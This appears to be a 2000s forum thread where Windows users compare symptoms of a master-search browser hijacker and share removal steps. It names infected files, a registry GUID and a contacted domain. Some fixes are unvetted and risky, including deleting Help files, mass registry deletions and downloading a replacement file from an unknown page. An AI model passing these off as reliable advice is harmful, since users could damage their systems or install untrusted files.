I think this cleaner may help . The advantage of the cleaner is , it will tell you before you fix ( doing one file at a time ) why the file is there . ===================================== CCleaner http://www.spazmatic.net/partners/ccleaner/ CCleaner (Crap Cleaner) is a freeware system optimisation tool. That removes unused and temporary files from your system - allowing it to run faster, more efficiently and giving you more hard disk space. The best part is that it's fast! (normally taking less that a second to run) and Free. :) Cleans the following: Internet Explorer Cache, History, Cookies, Index.dat. Recycle Bin, Temporary files and Log files. Recently opened URLs and files. Third-party application temp files and recent file lists (MRUs). Including: eMule, Kazaa, Google Toolbar, Netscape, Office XP, Nero, Adobe Acrobat, WinRAR and more... Advanced Registry scanner and cleaner to remove unused and old entries. Including File Extensions, ActiveX Controls, ClassIDs, ProgIDs, Uninstallers, Shared DLLs, Fonts, Help Files, Application Paths, Icons and more... This software is completely Freeware and contains no Spyware.

0

Ammendment to above . CCleaner , the advantage of this cleaner is , when Issues is clicked & the boxes ticked , it will tell you before you fix ( doing one file at a time ) why the file is there .

0

I still stand by the advice in #94 and my response in #104. I have Windows XP and just deleted the Microsoft Help file - the entire .chm file as directed in #94. No problems for 3 days, and who need Microsoft Help anyway?? BC

0

regarding response #109, just out of curiousity, has that fix work for anyone? what exactly does that registry attachment do anyways?

0

i think this virus has taken a new twist... i cant seem to access any websites... i notice this when i open a new window and my homepage which is google.ca wouldnt load up, giving me that IE screen when u type in a wrong address saying "this page can not be displayed" i then tried yahoo and msn site, with no luck... suprisingly i can access computing.net cause it was still in my history, dont think ccleaner is helping much cause i just ran it... although the program seems very useful anyone else have the same problem?

0

Fragyle ... we seem to be in similar stages of the disease. I too got a popup telling me I was infected and would I like to get a cure. In a moment of madness I clicked the "yes" ... and was redirected to ... guess? www.master-search.com So ... you don't have another virus ... just the same old annoying one that goes through different stages of its sick metamorphosis

0

thanks for confirming that nev, i had a feeling it was from master-search, i wonder what other stages does this annoying thing has under its sleeves

0

I updated my McAfee signatures today ... and found a new virus! The file crt32_v2.dll was on my drive. Others have found it to be automatically loaded when the browser is loaded. Apparently it attempts to communicate with main.tibssystems.com ... which we know is linked to master-search. It is associated with: {869EE607-5376-486d-8DAC-EDC8E239AD5F} I searched through my registry and found lots of references to it ... which I killed. Look at this: http://www.freedomlist.com/forum/viewtopic.php?t=15966&postdays=0&postorder=asc&start=20 I also found a site that had a replacement file for the Host file to block bad url's ... and I see they have included master-search. http://www.mvps.org/winhelp2002/hosts.txt We can only but keep trying ... My PC now seems to be the most stable it has been in days ... and is running noticeably faster - which can only be a good sign. Well ... it's not a bad sign anyway ... :O)

0

neville, i seem to have the same crt32_v2.dll file in my system32 folder, is it possible for u to list all the registry keys related to master-search so i can delete them off my computer? i fould the {869EE607-5376-486d-8DAC-EDC8E239AD5F) but is there any other keys i need to worry about? or any other files that may be infected? thanks

0

Wow Neville, that's quite a find. I updated the Symantec (Norton) virus file definitions, and it is scanning my computer as we speak. We'll see if Norton has picked up on it yet. If not, I will go over to McAfee and see if they have a free downloadable tool for it. Thanks for sharing this info for us. I also have the cr32 file, but it's not letting me delete it. I'm not sure why. I'm searching the {869EE607-5376-486d-8DAC-EDC8E239AD5F) file, so we'll see how that goes. Thanks again--this is real progress. The Beav

0

Neville, does McAfee give a name for this particular virus? Thanks!

0

To answer your questions one by one: 1) McAfee didn't give a name to the virus. It just said "Virus found in file Crt32_v2.dll" ... or something like that. It also said "cannot delete file". I can't remember exactly what I did - I may have rebooted or just run the scan again ... but the next time it tried - it succeeded in zapping it. 2) I use Norton Utilities as a tool. It has a Registry Editor which allows you to search your registry for specific things. I searched for the id of {869EE607-5376-486d-8DAC-EDC8E239AD5F} and it found a few ... which I deleted. It was being set up in something called Explorer Extensions ... which (I think) is why it was being loaded with the browser. I didn't keep a record of exactly how many entries there were - you must understand that this was in the early hours of the morning ... when I suddenly had the beast in my sights ... and a weapon in my hand. The scene resembled a bit of a chainsaw massacre moment as I gleefully and slightly hysterically found myself hitting the [delete] key next to instances I found. My primal experience caused me to forget some of the details. I did sleep well. 3) On a sobering note ... I have a deep paranoia that I have only succeeded in chopping off another of the legs of the Octopus ... and that there may be more waiting to be found. By the way ... is it at all possible that master-search has a collection of IP addresses (including all of ours) and that it is just constantly scanning to see if any of us are online ... and when it finds us it exploits some backdoor to zap us? (You can see the level of the paranoia I have reached). Please tell me this is impossible. I mentioned above that I had got a file for Hosts which blocks certain IP addresses. I can recommend this. A pleasant effect is that the number of popup ads has reduced DRAMATICALLY ... which makes the surfing experience much more pleasant.

0

Here are much better details than I have given: http://www.wilderssecurity.com/showthread.php?p=166395#post166395 I like very much that these guys are saying the fix is permanent. :O)

0

neville, thanks for the finding, i went in regedit and used the "find" option to locate all the 869EE607-5376-486d-8DAC-EDC8E239AD5F keys and delete them as they popped up i was surprise how many there was, anyways thanks for the help about that host file mentioned, can someone show me how to make use of it? where do i save the file?

0

Another great find, Neville! I followed the link and followed the instructions to remove the register files via regedit. I never did find that access[1].exe file, although it was blocked with ZoneAlarm. About your worries...I think if we follow these steps, and use a good firewall, we're fine. Did you install the Windows security patch? I think this was supposed to have shored up the hole that this little buggar was getting through. Anyway, we can always go back in to the registry files to see if these have shown up again in a few days or so. If they don't, then I think we're doing pretty good. This is a great thread, I'm going to keep it bookmarked and check in from time to time. I have a chat room on my own website, maybe we can all log in some time in the near future just to check on the state of our computers. Great work everybody! If you're still having problems, check out the last few posts, as they really address this bug's problem. The Beav

0

Just wanted to add my two cents to this mess. Here is a list of everything I have had to deal with. Maybe it will help someone make some sense of all this. Infection date on my computer occurred April 14 at 4:11 p.m. At that time notepad was modified and a file called load[1].exe was created, all at the exact same time. I have since, through zonealarm, not allowed this program to access the internet. The file is 31 kb large. On Aril 23 at 10:29 p.m. the file access[1].exe showed up on my computer, once again the file is 31 kb's large. I have disable its access to the Internet through zone alarm. Today, April 30, a little after 11 p.m. the file shelexec.exe showed up on my computer. Funny thing about this file is the location of it is D:\shelexec.exe. I have only one hard drive on my computer and it isnt the D drive. As a matter of fact, I have no D drive. The file Start.chm has shown up on my computer. When I opened it up it contained illegible script. I deleted its contents and made the file a read only. This has, I assume, kept my home page from being hijacked. My webpage was set to the same page as everyone else, mk:..., and loaded up a search page and porno page. The file start.html is not on my computer, at least not yet! Other symptoms... When I restart my computer and initially access the internet through IE, a program can be seen, very briefly, opening up. I assume this is the bug starting up. AVG, my virus software, detected the virus immeaditley on April 11 as Clicker.N... C:\Windows\Winlogon.exe C:\system volume information\_restore{B37680B2-BA0A-4E5D-BF30-83E44C5886243\RP329\A0027191.exe The virus infected both of these files. No software program that I have downloaded has yet to deal with the program effectivley. This includes every free spyware/adware program known to man. Hijack this showed mk:... as an R0 and I fixed both files. My web page has not been hijacked for two days now, but the little b---tard is still on my computer doing God only knows. The file C_10230 is located on my computer and cannot be deleted. If anybody else needs information as to the evolution of this bug on my computer, I will be more than happy to provide it. BTW...I use XP home edition. Jason

0

I am trying to find a fix to this problem right now... my problem is i have C:\searchpage.html and IE is constantly setting that as the homepage... but what i have done as a temporary fix is edit that .html file with notepad so it is <script language="JavaScript"> </script> so now u dont need to type in http:// and the sites will still work... if some1 could add an if statement so the homepage can be set it would be as good as without the parasite or w/e it is.... bye

0

ahhh sorry the script didnt show up ... go to http://www.angelfire.com/me4/thebox/searchfix.html right click on the link and do save target as.. then save it to C:\ and overwrite the current file

0